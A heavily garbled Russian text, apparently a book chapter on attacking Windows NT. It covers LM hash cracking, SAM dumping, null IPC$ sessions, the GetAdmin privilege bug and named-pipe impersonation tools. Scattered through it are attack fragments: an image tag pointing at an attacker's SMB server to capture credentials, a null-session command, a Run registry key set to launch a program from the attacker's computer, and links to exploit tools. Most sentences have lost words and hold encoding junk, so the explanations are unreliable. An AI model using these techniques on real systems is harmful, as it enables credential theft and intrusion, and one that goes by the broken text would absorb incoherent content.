Атака на Windows NT

Windows NT

Microsoft LAN Manager

SMB

Ал 20520k1016u 75;оритмы аутентификации, механизм «запрос-отклик»

Ал 20520k1016u 75;оритмы шифрования паролей

Ал 20520k1016u 75;оритмы хеширования - LM NT

LM LM

NT

Windows NT

L phtCrack

SAM

Windows NT

RedButton

Password Policy

SNMP

NtAddAtom

NPFS

UNIX Windows NT

Windows NT RSX M VMS[5] NT Windows NT

Windows NT ), но в силу самой архитектуры Windows NT

UNIX Windows NT TCP IP Microsoft Microsoft UNIX

Windows Windows NT UNIX

MS DOS  , а уже в 1984 году Microsoft Microsoft Network MS NET Microsoft LAN Manager Windows NT (redirector), протокол SMB (Server Message Block (Network Server LAN Manager

MS DOS OS UNIX Windows  Windows   for Workgroups Windows  Windows  Windows NT Microsoft LAN Manager DOS Windows  x LAN Manager Windows  Windows  Windows 

SMB Server Message Block SMB PC Network Program  MS DOS , ан нет!

с зашифрованными паролями, но большинство по-прежнему поддерживают ранние спецификации SMB SMB_COM_NEGOTIATE , выполнит его требование!

Ethernet DOS TCP IP DNS UDP DNS DNS ). Подобные атаки, получили название "Man in Middle

SMB Windows for Workgroups Windows  Windows  Windows NT родную для нее реализацию протокола SMB NT LM  NT LMv

UNIX

telnet UNIX . Очевидно, если злоумышленнику удастся перехватить все пакеты , он сумеет восстановить пароль.

UNIX Windows NT Jim Kelly Cliff Van Dyke Alt Ctrl Del Atl Ctrl Del Windows NT .

). В ветке реестра "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrenetVersion\Winlogon Everyone (всем пользователям), содержатся имя пользователя, вошедшего в систему, ("DefaultUsername") и его пароль ("DefaultPassword"). Если удаленные подключения разрешены, любой член группы Everyone

Microsoft

NetBIOS SMB_CON_NEGOTIATE SMB

, возвращает либо случайную 8-байтовую последовательность, именуемую challenge .

, посылает сообщение SMB_SESSION_SETUP_ANDX challenge

challenge invalid user

challenge challenge

f key value f value ^key crypt F crypt ^key value F key challenge value challenge crypt key value challenge crypt challenge challenge crypt key

f x y f x y y y x x

y x

Windows NT  Windows  LAN Manager LM Microsoft IBM OS Windows  Windows   for Workgroups Windows  Windows  NT

SAM Security Account Manager LM NT LM NT NT SAM LM LM NT .

Ал 20520k1016u 75;оритм получения LM a z DES LM

txt Ал 20520k1016u 75;оритм получения LM

f x y LM f x f y f P H LM

DES(0) -^P1..7 H_1..8;

DES(0) -^P8..14 H_9..16;

Какие существуют способы решения данных уравнений? Ал 20520k1016u 75;оритм DES DES .

DES k k k k k k k для подбора пароля, где k . Это намного меньше ожидаемого количества операций, необходимых для подбора четырнадцати символьного пароля!

k k k k k k k << (1+k k k k k k k k k k k k k k )*1/2, где знак "<<" обозначает «намного меньше». И пароль, состоящий из восьми и более символов, окажется ничуть не сложнее пароля, состоящего всего из семи символов! Фактически система запрашивает два семисимвольных пароля и обрабатывает их независимо друг от друга[25].

P DES ^P xAAD B B EE

LM xAAD B B EE

DES P DES H H H H

challenge DES DES

DES .

DES challenge, используя в качестве ключей различные фрагменты хеш - значения пароля, чем значительно уменьшает количество попыток, требуемых для его подбора. Ал 20520k1016u 75;оритм шифрования при близком рассмотрении выглядит так:

h

h h h

challenge DES

R

DES(challenge) -^h1..7 R_1..8

DES(challenge) -^h8..14 R_9..16

DES(challenge) -^h15..21 R_17..24

Microsoft

h известны заранее (они содержат нули, дописанные для расширения ключа до двадцатиоднобайтовой строки), то для решения уравнения DES(challenge) -^h15..21 R_17..24 h h x EE

DES ^P H H h P k k k k k k k k k k k k k k

k k k k k k k /2¹⁶ комбинаций, чтобы среди «кандидатов» в ключи уравнения DES(challenge) -^h8..14 R_9..16 найти единственный действительный ключ.

Уравнение же DES(challenge) -^h1..7 R_1..8 k k k k k k k вариантов в худшем случае и (1+k k k k k k k DES ^P H DES ^P H

в худшем случае займет поиск пароля? Для этого необходимо знать величину k DES A Z  x 

DES Pentium (Pentium III XEON

k k k k k k k k k k k k k k k k k k k k k k k k k k k k

Pentium II

l pntcrack jpg L phtCrack

phtcrack LM NT хешей. Авторы разработки - некто L0pht Heavy Industries https://www.l0pht.com/).

Разработчики L0phtCrack 2.5 - утверждают, что с ее помощью на Pentium II

NT MD Unicode  User Manager MD DES

UNIX Windows NT slat

LM Microsoft Service Pack  LM LM в базе SAM

Windows  Windows  LAN Manager Windows 

SMB UNIX

WEB <IMG SRC=file:////my.own.smb.server/mypets.jpg> . Когда это, наконец, произойдет, Internet Explorer Netscape Navigators

Windows NT  Service Pack Windows  Windows for Workgroups

Windows NT Guest Account

Windows NT SAM Security Account Manager %SystemRoot%\SYSTEM32\CONFIG\sam sam HKEY_LOCAL_MACHINE\SECURITY\SAM API

%SystemRoot%\Repair Everyone[29] Windows NT rdisk s expand sam sam SAMDUMP L phtcrack

sam

Windows NT (NULL session Windows NT, условно обозначаемых «D₁» и «D ». Если «D₁» доверяет «D D D

IPC inter process communication net use \\name\IPC$  USER name IP User Manager Event Viewer SMB

HKLM\Software\Microsoft\Windows\CurrentVersion\Run . Изменяя ее по своему усмотрению, злоумышленник сможет выполнить не только одну из программ, хранящихся на сервере, но и любую из программ, находящихся на его компьютере! Для этого он должен записать нечто вроде "\\mycomputer myprog mycomputer IP

RedButton Microsoft Windows NT  Service Pack  Windows NT  Microsoft Microsoft Knowledge Base Q

Service Pack Microsoft Q129457 «.with RestrictAnonymous access enabled, anonymous connections are able to obtain the password policy from a Windows NT Server. The password policy defines the Windows NT domain policy with respect to the minimum password length, whether blank passwords are permitted, maximum password age, and password history».

password policy аутентификации пользователя. Например, заведомо короткий пароль не стоит и проверять. В Windows NT policy Service Pack 

policy , (так, называемая история паролей). С точки зрения безопасности пароли необходимо периодически менять, - причем они не должны повторятся (во всяком случае, спустя короткое время). Например, в истории могут храниться пять последних паролей пользователя, и при смене пароля система проверяет, - не совпадает ли новый пароль с одним из них. Конечно, это пароли, на текущий момент, но их изучение позволяет понять: по какому принципу назначаются пароли, - выбираются ли словарные слова, даты рождения родственников, имена любимых хомячков или абсолютно случайные последовательности. Кстати, не исключено, что рано или поздно пользователь вновь выберет один из старых паролей, возможно, несколько его видоизменив.

Microsoft , предостерегая пользователей и администраторов от повторного выбора паролей. Но это не решает проблемы. Если пароли выбираются не абсолютно случайно, изучая их периодическую смену, злоумышленник может угадать очередной пароль или, по крайней мере, сузить круг перебора. Среди множества пользователей наверняка окажутся такие, кто халатно относится к безопасности и всегда выбирает короткие, запоминающиеся последовательности (а, следовательно, предсказуемые).

SNMP Simple Network Management Protocol SNMP

SNMP MIB Management Information Base - программные модули, собирающие информацию об управляемых объектах и размещающие полученную информацию в своих локальных переменных. Протокол SNMP MIB

MIB (community name public MIB Windows NT

finger MIB finger

ntoskrnl.exe sob@cmp.phys.msu.su NtAddAtom NtAddAtom System win  API  AddAtom NtAddAtom x E

GetAdmin

for(i=0;i<0x100;i++)

__asm

if( stack[1] == pNtGlobalFlag+1)

break;

Microsoft 1997 я послал письмо в Microsoft, что так и так, есть такой баг. Через пару дней получил ответ от господина N, что я ошибся, и вообще моя программа не работает. Послав программу на www.ntsecurity.net и на news я убедился, что она все-таки работает. После публикации мне пришло письмо от господина NN из Microsoft (должностью повыше, чем N) с просьбой сообщить имя господина N

Вообще же, если у пользователя есть право отладки приложений, ему должны быть доступны функции "WriteProcessMemory" и "CreateRemoteThread", позволяющие как угодно распоряжаться системой по своему усмотрению. Поскольку, ни один здравомыслящий администратор потенциальному злоумышленнику такого права не даст, тому приходится присваивать его самостоятельно. К сожалению, описание алгоритма такой атаки выходит за рамки данной книги, но существует утилита Sechole, написанная Prasad Dabak, Sandeep Phadke и Milind Borate, которая замещает код функции "OpenProcess

NPFS Named Pipe File System pipe pipaname CreateFile ReadFile WriteFile

CreateNamedPipe Microsoft

API

ImpersonateNamedPipeClient, (Impersonate)

guest Everyone

Windows NT CreateProcess

AdminTrap https://hackzone.ru/articles/AdmTrap.zip

Windows NT UNIX

Windows NT

non paged pool

High Explorer Shutdown

PipeBomb https://hackzone.ru/articles/PipeBomb.zip

AdminTrap PipeBomb winreg spoolss lsass LANMAN RCP lsarpc

Windows NT  Service Pack Windows  Internet SMB TCP Internet SMB

Microsoft выхода Windows 2000, выпустив 2 августа 2000 года заплатку «Service Control Manager Named Pipe Impersonation», которую можно получить, обратившись по адресу https://www.microsoft.com/Downloads/Release.asp?ReleaseID=23432.

Microsoft Windows   Professional Microsoft Windows   Server Microsoft Windows   Advanced Server Microsoft Security Bulletin (MS00-053).

NT Reset Microsoft

(Normal

Стругацкие "Гадкие Лебеди"